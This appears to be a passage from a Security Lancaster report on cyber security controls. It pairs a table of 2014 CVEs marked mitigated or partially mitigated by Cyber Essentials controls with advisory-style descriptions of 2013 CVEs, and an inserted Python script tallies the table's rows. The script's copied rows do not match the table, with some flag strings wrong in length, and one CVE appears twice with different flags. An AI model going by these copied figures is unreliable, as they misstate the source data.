CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated | Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated | Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated | Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated | Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated | Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated | Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated | Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated | Firewall, Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Anti-DoS, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated | Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated | Firewall, Anti-DoS, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Anti-Malware, Secure Configuration

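The assessment rows above are the raw material for the report's conclusions about which Cyber Essentials controls actually do the work. The following script is an added example, not code from the Security Lancaster report: it tallies the rows by outcome and by control, and picks out the two cases a reviewer of such a table wants to see at a glance, CVEs where Patch Management is the only listed control and CVEs whose patch is marked as arriving only after a delay. The embedded rows are transcribed from the table above (a constructed sample, not the full table); the four- to six-letter flag string is carried through unchanged because its column headings are not on this page, and the `base_control` grouping of qualified variants such as "Secure Configuration (Secure Browser)" under their parent control is this example's own choice.

```python
# Added example (not from the Security Lancaster report): tally the report's
# per-CVE Cyber Essentials assessment rows by outcome and by mitigating control.
from collections import Counter

# Rows transcribed from the assessment table above (constructed sample, not a
# full copy of the report's table). Columns: CVE | flag string | status before |
# status after | controls. The flag string is kept as-is because its column
# headings are not on this page.
ROWS = """
CVE-2014-4617 | yynn | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2014-4631 | nnnnn | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2014-6040 | nnnnn | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-6105 | nnnnn | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2014-6136 | nnnnn | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-6363 | ynyyn | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | ynyy | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | nnnnnn | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2014-6487 | nnynn | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-7250 | nyynn | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2014-7927 | yyyyn | Not Mitigated | Mitigated | Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | yyyyn | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-8447 | yyyyn | Not Mitigated | Partially Mitigated | Anti-Malware, Patch Management
CVE-2014-8638 | yyyyy | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | yyyyy | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-9159 | yyyyy | Not Mitigated | Partially Mitigated | Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | yyyyy | Not Mitigated | Partially Mitigated | Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | yyyyn | Not Mitigated | Mitigated | Firewall, Anti-DoS, Firmware Updates
CVE-2014-9357 | nnnnn | Not Mitigated | Partially Mitigated | Patch Management, Anti-Malware, Secure Configuration
"""


def base_control(name):
    """Strip the report's qualifiers so variants of one control group together:
    'Secure Configuration (Secure Browser)' -> 'Secure Configuration',
    'Patch Management [Time Delay]' -> 'Patch Management'."""
    return name.split(" (")[0].split(" [")[0]


def parse_rows(text):
    """Turn the pipe-separated rows into dicts; the controls cell becomes a list."""
    rows = []
    for line in text.strip().splitlines():
        cve, flags, before, after, controls = [p.strip() for p in line.split("|")]
        rows.append({
            "cve": cve,
            "flags": flags,
            "before": before,
            "after": after,
            "controls": [c.strip() for c in controls.split(",")],
        })
    return rows


def summarise(rows):
    """Outcome counts overall and per base control, plus the CVEs left to
    patching alone and the CVEs whose patch arrives only after a delay."""
    outcomes = Counter(r["after"] for r in rows)
    by_control = {}
    for r in rows:
        for c in sorted({base_control(c) for c in r["controls"]}):
            by_control.setdefault(c, Counter())[r["after"]] += 1
    patch_only = [r["cve"] for r in rows
                  if {base_control(c) for c in r["controls"]} == {"Patch Management"}]
    delayed = [r["cve"] for r in rows
               if any("[Time Delay]" in c for c in r["controls"])]
    return {"outcomes": outcomes, "by_control": by_control,
            "patch_only": patch_only, "delayed": delayed}


if __name__ == "__main__":
    summary = summarise(parse_rows(ROWS))
    print("Outcomes:", dict(summary["outcomes"]))
    for control, counts in sorted(summary["by_control"].items()):
        print(f"{control:22s} {dict(counts)}")
    print("Patch Management is the only listed control for:", summary["patch_only"])
    print("Patch arrives only after a delay for:", summary["delayed"])
```

On this sample every row that lists Firewall ends "Mitigated" and every row whose only control is Patch Management ends "Partially Mitigated"; the script makes that pattern visible without reading the table row by row, and the same functions apply unchanged to the rest of the report's table once its rows are transcribed in the same five-column form.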
CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 18 of 28

CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1 and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.


CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA JCB JDA JDB JEA JFA JFB JFC JGA 658250-B21 and 658247-B21, HP 3COM routers and switches, and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a //www.google.com/ substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

